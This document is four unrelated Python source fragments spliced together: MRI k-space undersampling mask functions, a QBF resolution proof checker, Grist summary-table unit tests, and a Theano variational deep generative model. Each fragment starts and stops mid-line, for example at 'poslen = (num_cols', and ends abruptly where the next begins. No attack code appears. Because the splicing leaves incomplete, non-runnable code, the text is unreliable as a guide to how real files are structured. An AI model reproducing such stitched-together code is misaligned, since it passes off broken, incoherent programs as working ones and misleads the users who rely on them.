self.poisson_masks = np.load(r"C:\Users\follels\Documents\fastMRI\cache\poisson_disc_masks\masks.npy")
def poisson_disc_calculation(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
shape,
seed,
) -> np.ndarray:
# Round to closest even number
self.rng_new = np.random.default_rng(seed)
inner_shape = ((shape[1] // 2) & ~1, (shape[2] // 2) & ~1)
accu_inner = np.zeros((inner_shape[0], inner_shape[1]), dtype=np.int32)
PS = PoissonSampler(inner_shape[0], inner_shape[1], 5, 2, 42, 0, 0.7)
mask_inner = PS.generate(self.rng_new, accu_inner)
outer_shape = (shape[1] & ~1, shape[2] & ~1)
accu_outer = np.zeros((outer_shape[0], outer_shape[1]), dtype=np.int32)
PS = PoissonSampler(outer_shape[0], outer_shape[1], 8, 4, 42, 0, 0.7)
mask_combined = PS.generate(self.rng_new, accu_outer)
mask_combined[mask_combined.shape[0] // 2 - inner_shape[0] // 2:mask_combined.shape[0] // 2 + inner_shape[0] // 2,
mask_combined.shape[1] // 2 - inner_shape[1] // 2:mask_combined.shape[1] // 2 + inner_shape[1] // 2] = mask_inner
# For uneven shapes
final_mask = np.zeros(shape[1:-1])
final_mask[0:mask_combined.shape[0], 0:mask_combined.shape[1]] = mask_combined
return final_mask
def calculate_acceleration_mask_3D(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
shape,
seed,
) -> np.ndarray:
if self.cached:
self.rng_new = np.random.default_rng(seed)
case_idx = self.rng_new.integers(0, 100)
mask = self.poisson_masks[case_idx]
else:
mask = self.poisson_disc_calculation(num_cols, acceleration, offset, num_low_frequencies, shape, seed)
return mask
class CartesianOffsetMask3D(MaskFunc3D):
def __init__(self, accelerations, allow_any_combination=False, seed=None):
super().__init__([0], accelerations, allow_any_combination, seed)
self.rng_new = np.random.default_rng(seed)
def calculate_acceleration_mask_3D(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
shape,
num_offsets,
seed,
) -> np.ndarray:
undersampling_masks = np.zeros((num_offsets, *shape[1:-1]))
for offset in range(num_offsets):
pattern = np.zeros(num_offsets)
pattern[offset] = 1
undersampling_masks[offset] = np.tile(pattern, int(np.prod(shape[1:-1]) / num_offsets)).reshape(*shape[1:-1])
undersampling_masks[:, int(shape[1] * 2/6):int(shape[1] * 4/6), int(shape[2] * 2/6):int(shape[2] * 4/6)] = 1
return undersampling_masks[None]
class MagicMaskFunc(MaskFunc):
"""
Masking function for exploiting conjugate symmetry via offset-sampling.
This function applies the mask described in the following paper:
<NAME>. (2019). Offset Sampling Improves Deep Learning based
Accelerated MRI Reconstructions by Exploiting Symmetry. arXiv preprint,
arXiv:1912.01101.
It is essentially an equispaced mask with an offset for the opposite site
of k-space. Since MRI images often exhibit approximate conjugate k-space
symmetry, this mask is generally more efficient than a standard equispaced
mask.
Similarly to ``EquispacedMaskFunc``, this mask will usually undereshoot the
target acceleration rate.
"""
def calculate_acceleration_mask(
self,
num_cols: int,
acceleration: int,
offset: Optional[int],
num_low_frequencies: int,
) -> np.ndarray:
"""
Produce mask for non-central acceleration lines.
Args:
num_cols: Number of columns of k-space (2D subsampling).
acceleration: Desired acceleration rate.
offset: Offset from 0 to begin masking. If no offset is specified,
then one is selected randomly.
num_low_frequencies: Not used.
Returns:
A mask for the high spatial frequencies of k-space.
"""
if offset is None:
offset = self.rng.randint(0, high=acceleration)
if offset % 2 == 0:
offset_pos = offset + 1
offset_neg = offset + 2
else:
offset_pos = offset - 1 + 3
offset_neg = offset - 1 + 0
poslen = (num_cols | |
with 0" % lineNumber)
return
vars = vars[:-1]
for v in vars:
if v <= 0 or v > self.nvar:
self.fail("Line %d. Invalid variable %d" % (lineNumber, v))
return
if v in foundDict:
self.fail("Line %d. Variable %d already declared on line %d" % (lineNumber, v, foundDict[v]))
return
foundDict[v] = lineNumber
self.varList.append((v, qlevel, isExistential))
# Prepare for next set of input variables
qlevel += 2
else:
if nclause == 0:
self.fail("Line %d. No header line. Not cnf" % (lineNumber))
return
# Check formatting
try:
lits = [int(s) for s in line.split()]
except:
self.fail("Line %d. Non-integer field" % lineNumber)
return
# Last one should be 0
if lits[-1] != 0:
self.fail("Line %d. Clause line should end with 0" % lineNumber)
return
lits = lits[:-1]
vars = sorted([abs(l) for l in lits])
if len(vars) == 0:
self.fail("Line %d. Empty clause" % lineNumber)
return
if vars[-1] > self.nvar or vars[0] == 0:
self.fail("Line %d. Out-of-range literal" % lineNumber)
return
for i in range(len(vars) - 1):
if vars[i] == vars[i+1]:
self.fail("Line %d. Opposite or repeated literal" % lineNumber)
return
self.clauses.append(lits)
clauseCount += 1
if clauseCount != nclause:
self.fail("Line %d: Got %d clauses. Expected %d" % (lineNumber, clauseCount, nclause))
return
# See if there are any undeclared variables
outerVars = [v for v in range(1, self.nvar+1) if v not in foundDict]
if len(outerVars) > 0:
# These must be added as existential variables in first quantifier block
ovarList = [(v, 1, True) for v in outerVars]
nvarList = [(v, qlevel+1, isExistential) for (v, qlevel, isExistential) in self.varList]
self.varList = ovarList + nvarList
# Clause processing
class ClauseManager:
# Mapping from Id to clause. Deleted clauses represented by None
clauseDict = {}
# For each literal, count of clauses containing it
literalCountDict = {}
# For each literal, set of clauses containing it (only in verbose mode)
literalSetDict = {}
# Track whether have empty clause
addedEmpty = False
# Counters
liveClauseCount = 0
maxLiveClauseCount = 0
totalClauseCount = 0
# Clauses that haven't been deleted (only in verbose mode)
liveClauseSet = set([])
def __init__(self, verbose):
self.verbose = verbose
self.clauseDict = {}
self.literalCountDict = {}
self.literalSetDict = {}
self.addedEmpty = False
self.liveClauseCount = 0
self.maxLiveClauseCount = 0
self.totalClauseCount = 0
self.liveClauseSet = set([])
def findClause(self, id):
if id not in self.clauseDict:
return (None, "Clause #%d never defined" % id)
elif self.clauseDict[id] is None:
return (None, "Clause #%d has been deleted" % id)
else:
return (self.clauseDict[id], "")
# Add clause. Should have been processed with cleanClause
# Return (T/F, reason)
def addClause(self, clause, id = None):
if not regularClause(clause):
return (False, "Cannot add clause %s" % showClause(clause))
newId = len(self.clauseDict)+1
if id is not None and id != newId:
return (False, "Invalid clause Id. Was expecting %d but got %s" % (newId, id))
self.clauseDict[newId] = clause
if len(clause) == 0:
self.addedEmpty = True
self.liveClauseCount += 1
self.totalClauseCount += 1
if self.verbose:
self.liveClauseSet.add(newId)
self.maxLiveClauseCount = max(self.liveClauseCount, self.maxLiveClauseCount)
# Add literals
for lit in clause:
if lit in self.literalCountDict:
self.literalCountDict[lit] += 1
if self.verbose:
self.literalSetDict[lit].add(newId)
else:
self.literalCountDict[lit] = 1
if self.verbose:
self.literalSetDict[lit] = set([newId])
return (True, "")
# Delete clause.
# Return (T/F, reason)
def deleteClause(self, id):
clause, msg = self.findClause(id)
if clause is None:
return (False, "Cannot delete clause %d: %s" % (id, msg))
self.clauseDict[id] = None
self.liveClauseCount -= 1
if self.verbose:
self.liveClauseSet.remove(id)
for lit in clause:
self.literalCountDict[lit] -= 1
if self.verbose:
self.literalSetDict[lit].remove(id)
return (True, "")
# Check that clause is generated by set of antecedents
# Assumes clause has been processed by cleanClause
# Return (T/F, Reason)
def checkResolution(self, clause, idList, subsetOK):
rids = list(idList)
rids.reverse()
if rids[0] not in self.clauseDict:
return (False, "Clause #%d does not exist" % rids[0])
rclause, msg = self.findClause(rids[0])
if rclause is None:
return (False, "Resolution failed: %s" % msg)
for nid in rids[1:]:
nclause, msg = self.findClause(nid)
if nclause is None:
return (False, "Resolution failed: %s" % msg)
try:
rclause = resolveClauses(rclause, nclause)
except ResolveException as ex:
return (False, "Failed to resolve clause #%d (%s) with partial result %s (%s)" % (nid, showClause(nclause), showClause(rclause), str(ex)))
if subsetOK and testClauseSubset(rclause, clause) or testClauseEquality(clause, rclause):
return (True, "")
else:
key = "allowed" if subsetOK else "not allowed"
return (False, "Antecedents resolve to %s, not to %s. Subset %s." % (showClause(rclause), showClause(clause), key))
# Check that clause is blocked w.r.t. its first literal
# Return (T/F, Reason)
def checkBlocked(self, clause, blockList):
if clause is None:
return (False, "Invalid clause")
if len(clause) == 0:
return (False, "Empty clause")
lit = clause[0]
subclause = clause[1:]
nlit = -lit
if nlit not in self.literalCountDict:
if len(blockList) == 0:
return (True, "")
else:
return (False, "No clauses recorded having literal %d. Expected %d" % nlit, len(blockList))
if len(blockList) != self.literalCountDict[nlit]:
msg = "Literal %d contained in %d clauses" % (nlit, self.literalCountDict[nlit])
if self.verbose:
msg += " (%s)" % str(list(self.literalSetDict[nlit]))
msg += ". %d given" % (len(blockList))
return (False, msg)
for nid in blockList:
id = abs(nid)
bclause, msg = self.findClause(id)
if bclause is None:
return (False, msg)
found = False
for clit in subclause:
if -clit in bclause:
found = True
break
if not found:
return (False, "Couldn't find complementary literal in clause #%d" % id)
return (True, "")
# Check that resolventList gives all resolvents from sourceList by resolution on var
def checkDavisPutnam(self, var, sourceList, resolventList, varDict):
(vlevel, isExistential) = varDict[var]
plist = []
nlist = []
for id in sourceList:
clause, msg = self.findClause(id)
if clause is None:
return (False, msg)
# Check all universal variables in clause
for clit in clause:
cvar = abs(clit)
if cvar not in varDict:
return (False, "Unknown variable %d in clause #%d" % (cvar, id))
(clevel, cex) = varDict[cvar]
if not cex and clevel > vlevel:
return (False, "Higher universal variable %d in clause for D-P reduction on %d" % (cvar, var))
if var in clause:
plist.append(clause)
elif -var in clause:
nlist.append(clause)
else:
return (False, "Clause #%d includes neither %d nor -%d" % (id, var, var))
if len(plist) != self.literalCountDict[var]:
msg = "Expecting %d clauses containing literal %d. Found %d" % (len(plist), var, self.literalCountDict[var])
if self.verbose:
msg += " (%s)" % (str(list(self.literalSetDict[var])))
return (False, msg)
if len(nlist) != self.literalCountDict[-var]:
msg = "Expecting %d clauses containing literal -%d. Found %d" % (len(nlist), var, self.literalCountDict[-var])
if self.verbose:
msg += " (%s)" % (str(list(self.literalSetDict[-var])))
return (False, msg)
checkList = []
for id in resolventList:
clause, msg = self.findClause(id)
if clause is None:
return (False, msg)
checkList.append(clause)
for pclause in plist:
for nclause in nlist:
rclause = resolveClauses(pclause, nclause)
if rclause is not None:
found = False
for mclause in checkList:
if testClauseEquality(rclause, mclause):
found = True
break
if not found:
return (False, "Couldn't find resolvent %s in candidate clauses" % showClause(rclause))
return (True, "")
class ProofException(Exception):
def __init__(self, value, lineNumber = None):
self.value = value
self.lineNumber = lineNumber
def __str__(self):
nstring = " (Line %d)" % self.lineNumber if self.lineNumber is not None else ""
return ("Proof Exception%s: " % nstring) + str(self.value)
class Prover:
verbose = False
lineNumber = 0
# Clause Manager
cmgr = None
# List of input variables.
# Mapping from variable number to (qlevel, isExistential)
varDict = {}
# Version of varDict created after shift variables
shiftedVarDict = {}
failed = False
# Levels for variables. Each is mapping from level to list of variables in that level
initialLevels = {}
shiftedLevels = {}
ruleCounters = {}
subsetOK = False
def __init__(self, qreader, verbose = False):
self.verbose = verbose
self.lineNumber = 0
self.cmgr = ClauseManager(verbose)
self.varDict = { v : (q, e) for (v, q, e) in qreader.varList }
self.shiftedVarDict = {}
self.failed = False
self.subsetOK = False
self.ruleCounters = {'a' : 0, 'ab' : 0, 'ar' : 0, 'd' : 0, 'dr' : 0, 'dd' : 0, 'l' : 0, 'u' : 0, 'x' : 0 }
for clause | |
"city", "count", "amount" ],
[ 1, "New York", 3, 1.+6+11 ],
[ 2, "Albany", 1, 2. ],
[ 3, "Seattle", 1, 3. ],
[ 4, "Chicago", 1, 4. ],
[ 5, "Bedford", 2, 5.+8 ],
[ 6, "Buffalo", 1, 7. ],
[ 7, "Boston", 1, 9. ],
[ 8, "Yonkers", 1, 10. ],
])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address'])
# Verify more fields of some of the new column objects.
self.assertTableData('_grist_Tables_column', rows="subset", cols="subset", data=[
['id', 'colId', 'type', 'formula', 'widgetOptions', 'label'],
[23, 'city', 'Text', '', '', 'City'],
[25, 'amount', 'Numeric', 'SUM($group.amount)', 'WidgetOptions2', 'Amount'],
])
# Change group-by to no columns (totals)
self.apply_user_action(["UpdateSummaryViewSection", 1, []])
self.assertTables([
self.starting_table,
# Note that Table #4 is gone at this point, since it's unused.
Table(5, "GristSummary_7_Address2", 0, 1, columns=[
Column(27, "count", "Int", True, "len($group)", 0),
Column(28, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(29, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=5, fields=[
Field(3, colRef=27),
Field(4, colRef=28),
])
])])
self.assertTableData('GristSummary_7_Address2', cols="subset", data=[
[ "id", "count", "amount"],
[ 1, 11, 66.0 ],
])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address2'])
# Back to full circle, but with group-by columns differently arranged.
self.apply_user_action(["UpdateSummaryViewSection", 1, [12,11]])
self.assertTables([
self.starting_table,
# Note that Table #5 is gone at this point, since it's unused.
Table(6, "GristSummary_7_Address", 0, 1, columns=[
Column(30, "state", "Text", False, "", 12),
Column(31, "city", "Text", False, "", 11),
Column(32, "count", "Int", True, "len($group)", 0),
Column(33, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(34, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=6, fields=[
Field(5, colRef=30),
Field(6, colRef=31),
Field(3, colRef=32),
Field(4, colRef=33),
])
])])
self.assertTableData('GristSummary_7_Address', cols="subset", data=[
[ "id", "city", "state", "count", "amount" ],
[ 1, "New York", "NY" , 3, 1.+6+11 ],
[ 2, "Albany", "NY" , 1, 2. ],
[ 3, "Seattle", "WA" , 1, 3. ],
[ 4, "Chicago", "IL" , 1, 4. ],
[ 5, "Bedford", "MA" , 1, 5. ],
[ 6, "Buffalo", "NY" , 1, 7. ],
[ 7, "Bedford", "NY" , 1, 8. ],
[ 8, "Boston", "MA" , 1, 9. ],
[ 9, "Yonkers", "NY" , 1, 10. ],
])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address'])
# Now add a different view section with the same group-by columns.
self.apply_user_action(["CreateViewSection", 1, 1, "record", [11,12]])
self.assertTables([
self.starting_table,
Table(6, "GristSummary_7_Address", 0, 1, columns=[
Column(30, "state", "Text", False, "", 12),
Column(31, "city", "Text", False, "", 11),
Column(32, "count", "Int", True, "len($group)", 0),
Column(33, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(34, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=6, fields=[
Field(5, colRef=30),
Field(6, colRef=31),
Field(3, colRef=32),
Field(4, colRef=33),
]),
Section(2, parentKey="record", tableRef=6, fields=[
Field(7, colRef=31),
Field(8, colRef=30),
Field(9, colRef=32),
Field(10, colRef=33),
])
])])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address'])
# Change one view section, and ensure there are now two summary tables.
self.apply_user_action(["UpdateSummaryViewSection", 2, []])
self.assertTables([
self.starting_table,
Table(6, "GristSummary_7_Address", 0, 1, columns=[
Column(30, "state", "Text", False, "", 12),
Column(31, "city", "Text", False, "", 11),
Column(32, "count", "Int", True, "len($group)", 0),
Column(33, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(34, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
Table(7, "GristSummary_7_Address2", 0, 1, columns=[
Column(35, "count", "Int", True, "len($group)", 0),
Column(36, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(37, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=6, fields=[
Field(5, colRef=30),
Field(6, colRef=31),
Field(3, colRef=32),
Field(4, colRef=33),
]),
Section(2, parentKey="record", tableRef=7, fields=[
Field(9, colRef=35),
Field(10, colRef=36),
])
])])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address',
'#summary#GristSummary_7_Address2'])
# Delete one view section, and see that the summary table is gone.
self.apply_user_action(["RemoveViewSection", 2])
self.assertTables([
self.starting_table,
# Note that Table #7 is gone at this point, since it's now unused.
Table(6, "GristSummary_7_Address", 0, 1, columns=[
Column(30, "state", "Text", False, "", 12),
Column(31, "city", "Text", False, "", 11),
Column(32, "count", "Int", True, "len($group)", 0),
Column(33, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(34, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
])
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=6, fields=[
Field(5, colRef=30),
Field(6, colRef=31),
Field(3, colRef=32),
Field(4, colRef=33),
])
])])
self.assertEqual(get_helper_cols('Address'), ['#summary#GristSummary_7_Address'])
# Delete source table, and ensure its summary table is also gone.
self.apply_user_action(["RemoveTable", "Address"])
self.assertTables([])
self.assertViews([])
#----------------------------------------------------------------------
def test_update_groupby_override(self):
# Verify that if we add a group-by column that conflicts with a formula, group-by column wins.
self.load_sample(self.sample)
self.apply_user_action(["CreateViewSection", 1, 0, "record", [12]])
self.apply_user_action(["AddColumn", "GristSummary_7_Address", "city",
{"formula": "$state.lower()"}])
# We should have a single summary table, and a single section referring to it.
self.assertTables([
self.starting_table,
Table(2, "GristSummary_7_Address", 0, 1, columns=[
Column(14, "state", "Text", False, "", 12),
Column(15, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
Column(16, "count", "Int", True, "len($group)", 0),
Column(17, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(18, "city", "Any", True, "$state.lower()", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=2, fields=[
Field(1, colRef=14),
Field(2, colRef=16),
Field(3, colRef=17),
Field(4, colRef=18),
])
])])
self.assertTableData('GristSummary_7_Address', cols="subset", data=[
[ "id", "state", "count", "amount" , "city"],
[ 1, "NY", 7, 1.+2+6+7+8+10+11 , "ny" ],
[ 2, "WA", 1, 3. , "wa" ],
[ 3, "IL", 1, 4. , "il" ],
[ 4, "MA", 2, 5.+9 , "ma" ],
])
# Change the section to add "city" as a group-by column; check that the formula is gone.
self.apply_user_action(["UpdateSummaryViewSection", 1, [11,12]])
self.assertTables([
self.starting_table,
Table(3, "GristSummary_7_Address2", 0, 1, columns=[
Column(19, "city", "Text", False, "", 11),
Column(20, "state", "Text", False, "", 12),
Column(21, "count", "Int", True, "len($group)", 0),
Column(22, "amount", "Numeric", True, "SUM($group.amount)", 0),
Column(23, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=3, fields=[
# We requested 'city' to come before 'state', check that this is the case.
Field(4, colRef=19),
Field(1, colRef=20),
Field(2, colRef=21),
Field(3, colRef=22),
])
])])
# TODO We should have more tests on UpdateSummaryViewSection that rearranges columns in
# interesting ways (e.g. add new column to middle of existing group-by columns; put group-by
# columns in the middle of other fields then UpdateSummary to rearrange them).
#----------------------------------------------------------------------
def test_cleanup_on_view_remove(self):
# Verify that if we remove a view, that unused summary tables get cleaned up.
# Create one view with one summary section, and another view with three sections.
self.load_sample(self.sample)
self.apply_user_action(["CreateViewSection", 1, 0, "record", [11,12]]) # Creates View #1
self.apply_user_action(["CreateViewSection", 1, 0, "record", []]) # Creates View #2
self.apply_user_action(["CreateViewSection", 1, 2, "record", [11,12]]) # Refers to View #2
self.apply_user_action(["CreateViewSection", 1, 2, "record", [12]]) # Refers to View #2
# We should have a single summary table, and a single section referring to it.
self.assertTables([
self.starting_table,
Table(2, "GristSummary_7_Address", 0, 1, columns=[
Column(14, "city", "Text", False, "", 11),
Column(15, "state", "Text", False, "", 12),
Column(16, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
Column(17, "count", "Int", True, "len($group)", 0),
Column(18, "amount", "Numeric", True, "SUM($group.amount)", 0),
]),
Table(3, "GristSummary_7_Address2", 0, 1, columns=[
Column(19, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
Column(20, "count", "Int", True, "len($group)", 0),
Column(21, "amount", "Numeric", True, "SUM($group.amount)", 0),
]),
Table(4, "GristSummary_7_Address3", 0, 1, columns=[
Column(22, "state", "Text", False, "", 12),
Column(23, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
Column(24, "count", "Int", True, "len($group)", 0),
Column(25, "amount", "Numeric", True, "SUM($group.amount)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=2, fields=[
Field(1, colRef=14),
Field(2, colRef=15),
Field(3, colRef=17),
Field(4, colRef=18),
])
]), View(2, sections=[
Section(2, parentKey="record", tableRef=3, fields=[
Field(5, colRef=20),
Field(6, colRef=21),
]),
Section(3, parentKey="record", tableRef=2, fields=[
Field(7, colRef=14),
Field(8, colRef=15),
Field(9, colRef=17),
Field(10, colRef=18),
]),
Section(4, parentKey="record", tableRef=4, fields=[
Field(11, colRef=22),
Field(12, colRef=24),
Field(13, colRef=25),
])
])])
# Now change the group-by to just one of the columns ('state')
self.apply_user_action(["RemoveView", 2])
# Verify that unused summary tables are also gone, but the one used remains.
self.assertTables([
self.starting_table,
Table(2, "GristSummary_7_Address", 0, 1, columns=[
Column(14, "city", "Text", False, "", 11),
Column(15, "state", "Text", False, "", 12),
Column(16, "group", "RefList:Address", True, "table.getSummarySourceGroup(rec)", 0),
Column(17, "count", "Int", True, "len($group)", 0),
Column(18, "amount", "Numeric", True, "SUM($group.amount)", 0),
]),
])
self.assertViews([View(1, sections=[
Section(1, parentKey="record", tableRef=2, fields=[
Field(1, colRef=14),
Field(2, colRef=15),
Field(3, colRef=17),
Field(4, colRef=18),
])
])])
#----------------------------------------------------------------------
@test_engine.test_undo
def test_update_sort_spec(self):
# Verify that we correctly update sort spec when we update a summary view section.
self.load_sample(self.sample)
self.apply_user_action(["CreateViewSection", 1, 0, "record", [11,12]])
self.apply_user_action(["UpdateRecord", "_grist_Views_section", 1,
{"sortColRefs": "[15,14,-17]"}])
# We should have a single summary table, and a single section referring to it.
self.assertTables([
self.starting_table,
Table(2, "GristSummary_7_Address", 0, 1, columns=[
Column(14, "city", "Text", False, "", 11),
Column(15, "state", "Text", | |
<reponame>kuleshov/neural-variational-inference
import time
import pickle
import numpy as np
from collections import OrderedDict
import theano
import theano.tensor as T
import lasagne
from theano.gradient import disconnected_grad as dg
from model import Model
from layers.shape import RepeatLayer
from layers import (
GaussianSampleLayer,
BernoulliSampleLayer,
GaussianMultiSampleLayer,
)
from helpers import (
iterate_minibatch_idx,
iterate_minibatches,
evaluate,
log_metrics
)
from distributions import log_bernoulli, log_normal2
from helpers import Tlogsumexp
from theano.tensor.shared_randomstreams import RandomStreams
from rbm import RBM
from aux_variational_rbm import AuxiliaryVariationalRBM
# ----------------------------------------------------------------------------
class UDADGM(Model):
"""Auxiliary Deep Generative Model (unsupervised version) with discrete z"""
def __init__(
self, n_dim, n_out, n_chan=1, n_superbatch=12800, model='bernoulli',
opt_alg='adam', opt_params={'lr' : 1e-3, 'b1': 0.9, 'b2': 0.99}
):
# save model that wil be created
self.model = model
self.n_sample = 3 # adjustable parameter, though 1 works best in practice
Model.__init__(self, n_dim, n_chan, n_out, n_superbatch, opt_alg, opt_params)
# random number generators
self.numpy_rng = np.random.RandomState(1234)
self.theano_rng = RandomStreams(self.numpy_rng.randint(2 ** 30))
(X, Y, idx1, idx2, S) = self.inputs
loss, acc = self.objectives
self.train = theano.function(
[idx1, idx2, self.alpha], [loss, self.log_e, self.z], updates=self.updates,
givens={X: self.train_set_x[idx1:idx2], Y: self.train_set_y[idx1:idx2]},
on_unused_input='warn'
)
llik = self.create_llik()
self.loss = theano.function(
[X, Y], [loss, llik],
on_unused_input='warn',
)
def create_model(self, X, Y, n_dim, n_out, n_chan=1):
# params
n_lat = 64 # latent stochastic variables
n_aux = 10 # auxiliary variables
n_hid = 500 # size of hidden layer in encoder/decoder
n_sam = self.n_sample # number of monte-carlo samples
n_hid_cv = 500 # size of hidden layer in control variate net
n_out = n_dim * n_dim * n_chan # total dimensionality of ouput
hid_nl = lasagne.nonlinearities.tanh
relu_shift = lambda av: T.nnet.relu(av+10)-10 # for numerical stability
# self.rbm = RBM(n_dim=int(np.sqrt(n_lat)), n_out=10, n_chan=1, opt_params={'nb':128})
self.rbm = AuxiliaryVariationalRBM(n_dim=int(np.sqrt(n_lat)), n_out=10, n_chan=1, opt_params={'nb':128*n_sam})
# create the encoder network
# create q(a|x)
l_qa_in = lasagne.layers.InputLayer(
shape=(None, n_chan, n_dim, n_dim),
input_var=X,
)
l_qa_hid = lasagne.layers.DenseLayer(
l_qa_in, num_units=n_hid,
nonlinearity=hid_nl,
)
l_qa_mu = lasagne.layers.DenseLayer(
l_qa_in, num_units=n_aux,
nonlinearity=None,
)
l_qa_logsigma = lasagne.layers.DenseLayer(
l_qa_in, num_units=n_aux,
nonlinearity=relu_shift,
)
# repeatedly sample
l_qa_mu = lasagne.layers.ReshapeLayer(
RepeatLayer(l_qa_mu, n_ax=1, n_rep=n_sam),
shape=(-1, n_aux),
)
l_qa_logsigma = lasagne.layers.ReshapeLayer(
RepeatLayer(l_qa_logsigma, n_ax=1, n_rep=n_sam),
shape=(-1, n_aux),
)
l_qa = GaussianSampleLayer(l_qa_mu, l_qa_logsigma)
# create q(z|a,x)
l_qz_in = lasagne.layers.InputLayer((None, n_aux))
l_qz_hid1a = lasagne.layers.DenseLayer(
l_qz_in, num_units=n_hid,
nonlinearity=hid_nl,
)
l_qz_hid1b = lasagne.layers.DenseLayer(
l_qa_in, num_units=n_hid,
nonlinearity=hid_nl,
)
l_qz_hid1b = lasagne.layers.ReshapeLayer(
RepeatLayer(l_qz_hid1b, n_ax=1, n_rep=n_sam),
shape=(-1, n_hid),
)
l_qz_hid2 = lasagne.layers.ElemwiseSumLayer([l_qz_hid1a, l_qz_hid1b])
l_qz_hid3 = lasagne.layers.DenseLayer(
l_qz_hid2, num_units=n_hid,
nonlinearity=hid_nl,
)
l_qz_mu = lasagne.layers.DenseLayer(
l_qz_hid3, num_units=n_lat,
nonlinearity=T.nnet.sigmoid,
)
l_qz = BernoulliSampleLayer(l_qz_mu)
l_qz_logsigma = None
# create the decoder network
# create p(x|z)
l_px_in = lasagne.layers.InputLayer((None, n_lat))
l_px_hid = lasagne.layers.DenseLayer(
l_px_in, num_units=n_hid,
W=lasagne.init.GlorotUniform(),
nonlinearity=hid_nl,
)
l_px_mu, l_px_logsigma = None, None
if self.model == 'bernoulli':
l_px_mu = lasagne.layers.DenseLayer(
l_px_hid, num_units=n_out,
nonlinearity=lasagne.nonlinearities.sigmoid,
)
elif self.model == 'gaussian':
l_px_mu = lasagne.layers.DenseLayer(
l_px_hid, num_units=n_out,
nonlinearity=None,
)
l_px_logsigma = lasagne.layers.DenseLayer(
l_px_hid, num_units=n_out,
nonlinearity=relu_shift,
)
# create p(a|z)
l_pa_hid = lasagne.layers.DenseLayer(
l_px_in, num_units=n_hid,
nonlinearity=hid_nl,
)
l_pa_mu = lasagne.layers.DenseLayer(
l_pa_hid, num_units=n_aux,
nonlinearity=None,
)
l_pa_logsigma = lasagne.layers.DenseLayer(
l_pa_hid, num_units=n_aux,
W=lasagne.init.GlorotNormal(),
b=lasagne.init.Normal(1e-3),
nonlinearity=relu_shift,
)
# create control variate (baseline) network
l_cv_in = lasagne.layers.InputLayer(
shape=(None, n_chan, n_dim, n_dim),
input_var=X,
)
l_cv_hid = lasagne.layers.DenseLayer(
l_cv_in, num_units=n_hid_cv,
nonlinearity=hid_nl,
)
l_cv = lasagne.layers.DenseLayer(
l_cv_hid, num_units=1,
nonlinearity=None,
)
# create variables for centering signal
c = theano.shared(np.zeros((1,1), dtype=np.float64), broadcastable=(True,True))
v = theano.shared(np.zeros((1,1), dtype=np.float64), broadcastable=(True,True))
# store certain input layers for downstream (quick hack)
self.input_layers = (l_qa_in, l_qz_in, l_px_in, l_cv_in)
self.n_lat = n_lat
self.n_lat2 = int(np.sqrt(n_lat))
self.n_hid = n_hid
return l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma, \
l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma, \
l_qa, l_qz, l_cv, c, v
def _create_components(self, deterministic=False):
# load network input
X = self.inputs[0]
x = X.flatten(2)
# duplicate entries to take into account multiple mc samples
n_sam = self.n_sample
n_out = x.shape[1]
x = x.dimshuffle(0,'x',1).repeat(n_sam, axis=1).reshape((-1, n_out))
# load networks
l_px_mu, l_px_logsigma, l_pa_mu, l_pa_logsigma, \
l_qa_mu, l_qa_logsigma, l_qz_mu, l_qz_logsigma, l_qa, l_qz, _, _, _ = self.network
l_qa_in, l_qz_in, l_px_in, l_cv_in = self.input_layers
# load network output
qa_mu, qa_logsigma, a = lasagne.layers.get_output(
[l_qa_mu, l_qa_logsigma, l_qa],
deterministic=deterministic,
)
qz_mu, z = lasagne.layers.get_output(
[l_qz_mu, l_qz],
{l_qz_in: a, l_qa_in: X},
deterministic=deterministic,
)
pa_mu, pa_logsigma = lasagne.layers.get_output(
[l_pa_mu, l_pa_logsigma], {l_px_in: z},
deterministic=deterministic,
)
if self.model == 'bernoulli':
px_mu = lasagne.layers.get_output(
l_px_mu, {l_px_in: z}, deterministic=deterministic)
elif self.model == 'gaussian':
px_mu, px_logsigma = lasagne.layers.get_output(
[l_px_mu, l_px_logsigma], {l_px_in: z},
deterministic=deterministic,
)
# entropy term
log_qa_given_x = log_normal2(a, qa_mu, qa_logsigma).sum(axis=1)
